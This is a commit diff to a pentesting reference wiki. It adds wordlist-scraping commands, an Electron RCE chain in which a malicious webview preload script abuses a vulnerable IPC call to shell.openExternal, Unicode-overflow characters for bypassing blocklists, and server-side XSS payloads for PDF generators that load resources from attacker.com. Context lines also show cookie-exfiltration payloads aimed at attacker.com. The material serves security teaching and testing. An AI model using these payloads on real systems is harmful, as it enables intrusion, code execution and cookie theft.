impr

carlospolop · carlospolop · commit 10716fa4d087 · 2025-03-09T15:16:11.000+01:00
diff --git a/src/generic-hacking/brute-force.md b/src/generic-hacking/brute-force.md
@@ -36,10 +36,17 @@ crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using chars
 crunch 6 8 -t ,@@^^%%
 ```
 
-### Cewl
+### Website based wordlists
 
 ```bash
+# Cewl gets words from the victims page
 cewl example.com -m 5 -w words.txt
+
+# Tok (https://github.com/tomnomnom/hacks/tree/master/tok) gets words from a list of URLs
+cat /path/to/urls.txt | tok
+
+# https://github.com/m4ll0k/BBTz/blob/master/getjswords.py gets words from a list of JS URLs
+cat /path/to/js-urls.txt | python3 getjswords.py
 ```
 
 ### [CUPP](https://github.com/Mebus/cupp)
diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
@@ -248,6 +248,31 @@ In macos, the `openExternal` function can be exploited to execute arbitrary comm
 </script>
 ```
 
+## RCE: webviewTag + vulnerable preload IPC + shell.openExternal
+
+This vuln can be found in **[this report](https://flatt.tech/research/posts/escaping-electron-isolation-with-obsolete-feature/)**.
+
+The **webviewTag** is a **deprecated feature** that allows the use of **NodeJS** in the **renderer process**, which should be disabled as it allows to load a script inside the preload context like:
+
+```xml
+<webview src="https://example.com/" preload="file://malicious.example/test.js"></webview>
+```
+
+Therefore, an attacker that manages to load an arbitrary page could use that tag to **load an arbitrary preload script**.
+
+This preload script was abused then to call a **vulnerable IPC service (`skype-new-window`)** which was calling calling **`shell.openExternal`** to get RCE:
+
+```javascript
+(async() => {
+    const { ipcRenderer } = require("electron");
+    await ipcRenderer.invoke("skype-new-window", "https://example.com/EXECUTABLE_PATH");
+    setTimeout(async () => {
+        const username = process.execPath.match(/C:\\Users\\([^\\]+)/);
+        await ipcRenderer.invoke("skype-new-window", `file:///C:/Users/${username[1]}/Downloads/EXECUTABLE_NAME`);
+    }, 5000);
+})();
+```
+
 ## Reading Internal Files: XSS + contextIsolation
 
 **Disabling `contextIsolation` enables the use of `<webview>` tags**, similar to `<iframe>`, for reading and exfiltrating local files. An example provided demonstrates how to exploit this vulnerability to read the contents of internal files:
diff --git a/src/pentesting-web/clickjacking.md b/src/pentesting-web/clickjacking.md
@@ -106,6 +106,8 @@ Firstly [explained in this post](https://securityaffairs.com/172572/hacking/doub
 
 An example could be seen in this video: [https://www.youtube.com/watch?v=4rGvRRMrD18](https://www.youtube.com/watch?v=4rGvRRMrD18)
 
+A code example can be found in [this page](https://www.paulosyibelo.com/2024/12/doubleclickjacking-what.html).
+
 > [!WARNING]
 > This technique allows to trick the user to click on 1 place in the victim page bypassing every protection against clickjacking. So the attacker needs to find **sensitive actions that can be done with just 1 click, like OAuth prompts accepting permissions**.
 
diff --git a/src/pentesting-web/unicode-injection/unicode-normalization.md b/src/pentesting-web/unicode-injection/unicode-normalization.md
@@ -99,10 +99,20 @@ When the backend is **checking user input with a regex**, it might be possible t
 
 The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows to **generate variation of the input** to fuzz the backend. Fore more info check the **github** and this [**post**](https://0xacb.com/2022/11/21/recollapse/).
 
+## Unicode Overflow
+
+From this [blog](https://portswigger.net/research/bypassing-character-blocklists-with-unicode-overflows), the maximum value of a byte is 255, if the server is vulnerable, an overflow can be crafted to produce a specific and unexpected ASCII character. For example, the following characters will be converted to `A`:
+
+- 0x4e41
+- 0x4f41
+- 0x5041
+- 0x5141
+
 ## References
 
 - [**https://labs.spotify.com/2013/06/18/creative-usernames/**](https://labs.spotify.com/2013/06/18/creative-usernames/)
 - [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
 - [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html)
+- [https://portswigger.net/research/bypassing-character-blocklists-with-unicode-overflows](https://portswigger.net/research/bypassing-character-blocklists-with-unicode-overflows)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md b/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
@@ -23,7 +23,7 @@ Also, note that in a regular exploitation you will be **able to see/download the
 ### Discovery
 
 ```html
-<!-- Basic discovery, Write somthing-->
+<!-- Basic discovery, Write something-->
 <img src="x" onerror="document.write('test')" />
 <script>document.write(JSON.stringify(window.location))</script>
 <script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
@@ -33,6 +33,22 @@ Also, note that in a regular exploitation you will be **able to see/download the
 <img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
 <script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
 <link rel=attachment href="http://attacker.com">
+
+<!-- Using base HTML tag -->
+<base href="http://attacker.com" />
+
+<!-- Loading external stylesheet -->
+<link rel="stylesheet" src="http://attacker.com" />
+
+<!-- Meta-tag to auto-refresh page -->
+<meta http-equiv="refresh" content="0; url=http://attacker.com/" />
+
+<!-- Loading external components -->
+<input type="image" src="http://attacker.com" />
+<video src="http://attacker.com" />
+<audio src="http://attacker.com" />
+<audio><source src="http://attacker.com"/></audio>
+<svg src="http://attacker.com" />
 ```
 
 ### SVG
@@ -185,6 +201,7 @@ Capturing the **PDF response** with burp should also **show the attachment in cl
 - [https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/](https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/)
 - [https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html](https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html)
 - [https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c](https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c)
+- [https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-pdf-generators-a-complete-guide-to-finding-ssrf-vulnerabilities-in-pdf-generators](https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-pdf-generators-a-complete-guide-to-finding-ssrf-vulnerabilities-in-pdf-generators)
 
 {{#include ../../banners/hacktricks-training.md}}
 
